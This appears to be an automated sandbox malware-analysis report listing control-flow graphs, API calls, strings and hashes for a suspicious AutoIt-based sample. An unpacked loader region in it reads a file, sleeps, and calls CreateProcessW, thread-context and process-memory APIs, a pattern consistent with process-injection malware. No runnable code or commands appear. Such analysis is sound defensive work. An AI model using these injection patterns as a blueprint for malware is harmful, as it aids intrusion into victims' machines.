                                                                                                                                                                                                                control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2002 40112c-401141 DefWindowProcW 1997->2002 2000 401184-40118e call 401250 1998->2000 2001 40114c-40114f 1998->2001 1999->1998 2003 401120-401126 1999->2003 2011 401193-40119a 2000->2011 2004 401151-401157 2001->2004 2005 40119d 2001->2005 2003->2002 2007 42b038-42b03f 2003->2007 2008 401219-40121f 2004->2008 2009 40115d 2004->2009 2012 4011a3-4011a9 2005->2012 2013 42afb4-42afc5 call 40f190 2005->2013 2007->2002 2010 42b045-42b059 call 401000 call 40e0c0 2007->2010 2008->2003 2016 401225-42b06d call 468b0e 2008->2016 2014 401163-401166 2009->2014 2015 42b01d-42b024 2009->2015 2010->2002 2012->2003 2019 4011af 2012->2019 2013->2011 2021 42afe9-42b018 call 40f190 call 401a50 2014->2021 2022 40116c-401172 2014->2022 2015->2002 2020 42b02a-42b033 call 4370f4 2015->2020 2016->2011 2019->2003 2026 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2019->2026 2027 4011db-401202 SetTimer RegisterWindowMessageW 2019->2027 2020->2002 2021->2002 2022->2003 2030 401174-42afde call 45fd57 2022->2030 2027->2011 2028 401204-401216 CreatePopupMenu 2027->2028 2030->2002 2045 42afe4 2030->2045 2045->2011
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                                                                                                                                                                • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                                                                                                                                                                • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                                                                                                                                                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                                                                                                                                                                • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                                                                                                                                                                • CreatePopupMenu.USER32 ref: 00401204
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                                                                                                                • String ID: TaskbarCreated
                                                                                                                                                                                                                • API String ID: 129472671-2362178303
                                                                                                                                                                                                                • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                                                                                                                                                                                                                Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                                                                                                                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                                                                                                                                                                                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                • std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                                                                                                                                                                                                                • String ID: ,*H$4*H$@fI
                                                                                                                                                                                                                • API String ID: 615853336-1459471987
                                                                                                                                                                                                                • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                                                                                • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D
                                                                                                                                                                                                                Function 040DE600 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 2065 40de600-40de6ae call 40dc040 2068 40de6b5-40de6db call 40df510 CreateFileW 2065->2068 2071 40de6dd 2068->2071 2072 40de6e2-40de6f2 2068->2072 2073 40de82d-40de831 2071->2073 2080 40de6f9-40de713 VirtualAlloc 2072->2080 2081 40de6f4 2072->2081 2074 40de873-40de876 2073->2074 2075 40de833-40de837 2073->2075 2077 40de879-40de880 2074->2077 2078 40de839-40de83c 2075->2078 2079 40de843-40de847 2075->2079 2082 40de8d5-40de8ea 2077->2082 2083 40de882-40de88d 2077->2083 2078->2079 2084 40de849-40de853 2079->2084 2085 40de857-40de85b 2079->2085 2086 40de71a-40de731 ReadFile 2080->2086 2087 40de715 2080->2087 2081->2073 2092 40de8ec-40de8f7 VirtualFree 2082->2092 2093 40de8fa-40de902 2082->2093 2090 40de88f 2083->2090 2091 40de891-40de89d 2083->2091 2084->2085 2094 40de85d-40de867 2085->2094 2095 40de86b 2085->2095 2088 40de738-40de778 VirtualAlloc 2086->2088 2089 40de733 2086->2089 2087->2073 2096 40de77f-40de79a call 40df760 2088->2096 2097 40de77a 2088->2097 2089->2073 2090->2082 2098 40de89f-40de8af 2091->2098 2099 40de8b1-40de8bd 2091->2099 2092->2093 2094->2095 2095->2074 2105 40de7a5-40de7af 2096->2105 2097->2073 2101 40de8d3 2098->2101 2102 40de8bf-40de8c8 2099->2102 2103 40de8ca-40de8d0 2099->2103 2101->2077 2102->2101 2103->2101 2106 40de7b1-40de7e0 call 40df760 2105->2106 2107 40de7e2-40de7f6 call 40df570 2105->2107 2106->2105 2113 40de7f8 2107->2113 2114 40de7fa-40de7fe 2107->2114 2113->2073 2115 40de80a-40de80e 2114->2115 2116 40de800-40de804 CloseHandle 2114->2116 2117 40de81e-40de827 2115->2117 2118 40de810-40de81b VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040DE6D1
                                                                                                                                                                                                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040DE8F7
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFileFreeVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 204039940-0
                                                                                                                                                                                                                • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                                                                                                                                                • Instruction ID: d914517ba37b06ff15eab41dee2cfef785d20ad5d30c0d9c91961c9788d7d99d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDA10674E00709EBDB54CFA4C894BEEBBB5FF48304F208169E605BB280D775AA44CB95
                                                                                                                                                                                                                Function 0040E4C0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79registryCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 2119 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2122 427190-4271ae RegQueryValueExW 2119->2122 2123 40e4eb-40e4f0 2119->2123 2124 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2122->2124 2125 42721a-42722a RegCloseKey 2122->2125 2130 427210-427219 call 436508 2124->2130 2131 4271f7-42720e call 402160 2124->2131 2130->2125 2131->2130
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                                                                                                                • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                                                                                                • API String ID: 1586453840-614718249
                                                                                                                                                                                                                • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                                                                                                • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                                                                                                                Function 00410570 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43COMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 2136 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                                                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                                                                                                                • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$CreateShow
                                                                                                                                                                                                                • String ID: AutoIt v3$edit
                                                                                                                                                                                                                • API String ID: 1584632944-3779509399
                                                                                                                                                                                                                • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                                                                                                                Function 040DE3F0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137fileCOMMON
                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 2137 40de3f0-40de4fb call 40dc040 call 40de2e0 CreateFileW 2144 40de4fd 2137->2144 2145 40de502-40de512 2137->2145 2146 40de5b2-40de5b7 2144->2146 2148 40de519-40de533 VirtualAlloc 2145->2148 2149 40de514 2145->2149 2150 40de535 2148->2150 2151 40de537-40de54e ReadFile 2148->2151 2149->2146 2150->2146 2152 40de550 2151->2152 2153 40de552-40de58c call 40de320 call 40dd2e0 2151->2153 2152->2146 2158 40de58e-40de5a3 call 40de370 2153->2158 2159 40de5a8-40de5b0 ExitProcess 2153->2159 2158->2159 2159->2146
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 040DE2E0: Sleep.KERNELBASE(000001F4), ref: 040DE2F1
                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040DE4F1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateFileSleep
                                                                                                                                                                                                                • String ID: YOVLVLFDH4ZZNGSK4
                                                                                                                                                                                                                • API String ID: 2694422964-1138834768
                                                                                                                                                                                                                • Opcode ID: e65a993e409eec5c6226dc0bf6d294f85f70c612e6761850d1eb94914adeafef
                                                                                                                                                                                                                • Instruction ID: 0dc14452af8bc2ce9d08a23b411752484cada8372222fe29fe15bdafa2cf25fe
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e65a993e409eec5c6226dc0bf6d294f85f70c612e6761850d1eb94914adeafef
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F517171E04349DAEF11DBA4C818BEFBBB5AF05304F004199E6097B2C0E7791B48CBA5
                                                                                                                                                                                                                Function 00401B80 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91windowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00401C41
                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00401C5D
                                                                                                                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                • String ID: Line:
                                                                                                                                                                                                                • API String ID: 1874344091-1585850449
                                                                                                                                                                                                                • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                                                                • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                                                                                                                                                                                Function 0040F250 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 66registryCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                                                                                                                • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Close$OpenQueryValue
                                                                                                                                                                                                                • String ID: Control Panel\Mouse
                                                                                                                                                                                                                • API String ID: 1607946009-824357125
                                                                                                                                                                                                                • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                                                                • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                                                                                                                Function 004102B0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                                                                                                                • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                                                                                                                • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                                                                                                                • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1673221597.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673188916.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673346505.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673373360.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673448164.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673476521.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.1673640696.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3170942423-0
                                                                                                                                                                                                                • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                                                                • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                                                                                                                Function 040DD2E0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 040DDA9B
                                                                                                                                                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040DDB31
                                                                                                                                                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040DDB53
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.1675230613.00000000040DC000.00000040.00000020.00020000.00000000.sdmp, Offset: 040DC000, based on PE: false
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_40dc000_N2Qncau2rN.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2438371351-0
                                                                                                                                                                                                                • Opcode ID: fc310a6135c3389c0587bc6629e9838c2c50d5be0bfc8bfa2df8a04cac11b1e3
                                                                                                                                                                                                                • Instruction ID: 0eee7f9c9c2b194149b59b60255195c85aac7e6f817e96e58dcd265d5b2bbb65
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fc310a6135c3389c0587bc6629e9838c2c50d5be0bfc8bfa2df8a04cac11b1e3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4621A30A14258DBEB24DFA4C850BDEB372EF58304F1091A9D10DFB294E779AE85CB59
                                                                                                                                                                                                                Function 0040BD80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
